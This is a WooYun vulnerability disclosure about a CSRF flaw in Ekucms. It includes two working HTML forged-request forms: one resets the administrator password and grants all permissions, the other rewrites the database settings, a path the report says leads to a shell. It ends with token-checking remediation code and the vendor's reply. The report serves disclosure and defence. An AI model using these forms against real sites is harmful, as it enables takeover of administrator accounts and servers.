
Defect ID: wooyun-2015-0102877

Title: CSRF vulnerability in Ekucms (易酷CMS), exploitable to getshell

Related vendor: ekucms.com

Author: 90Snake

Submitted: 2015-03-25 12:41

Fixed: 2015-06-24 12:14

Published: 2015-06-24 12:14

Vulnerability type: CSRF

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-25: Details sent to the vendor, awaiting vendor handling
2015-03-26: Vendor confirmed; details disclosed to the vendor only
2015-03-29: Details opened to third-party security partners
2015-05-20: Details opened to core white hats and relevant domain experts
2015-05-30: Details opened to regular white hats
2015-06-09: Details opened to intern white hats
2015-06-24: Details disclosed to the public

Brief description:

CSRF

Detailed description:

The impact is significant. First, the administrator password can be changed through a forged cross-site request; the admin update handler accepts the POST below without any check that the request originated from the admin's own session:


<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/index.php?s=Admin/Master/Update" method="POST">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="pwd2" value="7fef6171469e80d32c0559f88b377245" />
<input type="hidden" name="pwd" value="shabi123" />
<input type="hidden" name="repwd" value="shabi123" />
<input type="hidden" name="usertype&#91;0&#93;" value="1" />
<input type="hidden" name="usertype&#91;1&#93;" value="1" />
<input type="hidden" name="usertype&#91;2&#93;" value="1" />
<input type="hidden" name="usertype&#91;3&#93;" value="1" />
<input type="hidden" name="usertype&#91;4&#93;" value="1" />
<input type="hidden" name="usertype&#91;5&#93;" value="1" />
<input type="hidden" name="usertype&#91;6&#93;" value="1" />
<input type="hidden" name="usertype&#91;7&#93;" value="1" />
<input type="hidden" name="usertype&#91;8&#93;" value="1" />
<input type="hidden" name="usertype&#91;9&#93;" value="1" />
<input type="hidden" name="usertype&#91;10&#93;" value="1" />
<input type="hidden" name="usertype&#91;11&#93;" value="1" />
<input type="hidden" name="usertype&#91;12&#93;" value="1" />
<input type="hidden" name="usertype&#91;13&#93;" value="1" />
<input type="hidden" name="usertype&#91;14&#93;" value="1" />
<input type="hidden" name="usertype&#91;15&#93;" value="1" />
<input type="hidden" name="usertype&#91;16&#93;" value="1" />
<input type="hidden" name="usertype&#91;17&#93;" value="1" />
<input type="hidden" name="usertype&#91;18&#93;" value="1" />
<input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
<input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="8637bf9833545453f7649bd6e16ad060" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Second, the database connection settings can be changed the same way:


<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/index.php?s=Admin/Config/Updatedb" method="POST">
<input type="hidden" name="con&#91;db&#95;host&#93;" value="admin" />
<input type="hidden" name="con&#91;db&#95;name&#93;" value="ekucms" />
<input type="hidden" name="con&#91;db&#95;user&#93;" value="root" />
<input type="hidden" name="con&#91;db&#95;pwd&#93;" value="admin888" />
<input type="hidden" name="con&#91;db&#95;port&#93;" value="3306" />
<input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
<input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="c59f9ef9c6e6f578038f368ff2b9817a" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

From that page SQL statements can be executed, which can be leveraged to obtain a shell and escalate privileges.

Proof of vulnerability:

Identical to the detailed description above.

Remediation:

Add an anti-CSRF token to the admin forms and verify it server-side.
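As an added example (not code from the original report or from Ekucms), the server-side token check the remediation asks for. The PoC forms above carry a fixed `__hash__` value, so the check has to compare the submitted field against an unpredictable per-session value held on the server, in constant time, and rotate it after use; the function names, the in-memory session dict and the constructed request data are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

TOKEN_FIELD = "__hash__"      # hidden field name the Ekucms forms already carry
SESSION_KEY = "csrf_token"    # server-side slot for the session's current token


def issue_token(session: dict) -> str:
    """Generate a fresh 128-bit random token, keep it in the server-side
    session and return it so the admin form can embed it as a hidden field."""
    token = secrets.token_hex(16)
    session[SESSION_KEY] = token
    return token


def _same_origin(url: str, site_origin: str) -> bool:
    """Exact scheme://host[:port] comparison; a prefix test would let
    http://127.0.0.1.evil through."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def verify_request(session: dict, form: dict, headers: dict,
                   site_origin: str, rotate: bool = True) -> bool:
    """Gate for state-changing admin handlers such as Master/Update and
    Config/Updatedb. Passes only if (1) an Origin or Referer header, when
    present, belongs to this site and (2) the submitted token equals the
    session's copy, compared in constant time. On success the token is
    rotated so a captured value cannot be replayed."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is not None and not _same_origin(origin, site_origin):
        return False
    expected = session.get(SESSION_KEY)
    submitted = form.get(TOKEN_FIELD)
    if not expected or not isinstance(submitted, str):
        return False
    if not hmac.compare_digest(expected, submitted):
        return False
    if rotate:
        issue_token(session)
    return True


if __name__ == "__main__":
    session = {}                      # constructed admin session
    token = issue_token(session)      # token rendered into the real form
    legit = {"id": "1", "pwd": "newpass", TOKEN_FIELD: token}
    print(verify_request(session, legit, {"Origin": "http://127.0.0.1"}, "http://127.0.0.1"))
    # cross-site page replaying the static __hash__ value from the report's PoC
    forged = {"id": "1", "pwd": "shabi123", TOKEN_FIELD: "8637bf9833545453f7649bd6e16ad060"}
    print(verify_request(session, forged, {"Origin": "http://attacker.example"}, "http://127.0.0.1"))
```

The same check should run before every POST handler under Admin/, not only the two shown in the report.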

Copyright notice: when reposting, please credit the source 90Snake@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 2

Confirmed at: 2015-03-26 12:12

Vendor reply:

So the prerequisite for exploiting this is knowing the system's important parameters, such as the administrator account, password and DB details, right? A token is indeed necessary; thank you for the reminder~!

Latest status:

None yet